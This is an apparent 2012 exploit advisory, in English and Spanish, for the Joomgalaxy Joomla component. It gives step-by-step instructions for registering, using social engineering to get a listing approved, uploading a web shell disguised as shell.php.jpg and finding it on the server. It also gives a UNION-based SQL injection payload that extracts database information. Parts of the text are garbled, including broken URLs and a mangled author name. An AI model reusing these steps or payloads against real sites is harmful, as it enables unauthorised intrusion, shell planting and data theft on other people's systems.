Title: Joomla joomgal4241.2.0.4 Multiple Vulnerabilites
By Daniel Barragan "D4NB4R"
Developer: http://www.joomgalaxy.com/
Affected Versions: 1.2.0.4 (last update on Jul 27,201 2)
Test Platform: [Linux (bt5)-Windows (7 ultimate)]
Introduction
Joomgalaxy is a rich, comprehensive directory component brimming with unique
Features like Entry comparison, Pay per download, Tagging, Email Cloaking,
Review and Rating with Multiple Attributes, add Articles to Entries,
With faster more plus all standard directory features as well.
1. Illegal File Upload
1a. Go to this route, Complete the form and login the site
Ingrese a esta ruta, Complete el formulario e ingrese al sitio
A http://www.bkjia.com/index. php? Option = com_users & view = registration
1b. go to the following link and create a new post (sometimes it ask
Confirmation of an administrator)
So then create the post with something of social engineering and wait
For a confirmation, if not forget this step
Vaya a este enstmcree un nuevo anuncio "Algunas veces pide confirmacion de administrador"
Asi que cree el anuncio con algo de ingenieria social y espere que confirmen
Si no omita este paso
A http://www.bkjia.com/index. php? Option = com_joomgalaxy & view = addentry
1c. once the post is published go to the tab images and upload your shell in
Following way: shell.php.jpg
Una vez resgistrado el anuncio dirijase a la pestaña imagenes y suba su
Shell de la siguiente forma
Shell.php.jpg
1d. Find your shell in the path
Busque su shell en este path
Http://www.bkjia.com/administrator/components/com_joomgalaxy/assets/images/Image_gallery/randomid_shell.php.jpg
2. SQL Injection
P0c:
A http://www.bkjia.com/index. php? Option = com_joomgalaxy & view = categorylist & type = thumbnail & lang = en & catid = 100000001-100000001 = 0
Union (select 1, database (), 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13)
Gretz: devboot, P1l0tcast, ksha, dedalo, etc ..
Im not responsible for which is given
No me hago responsable del uso que se le de
_______________________________________________
Daniel barriers Ragan "D4NB4R" 2012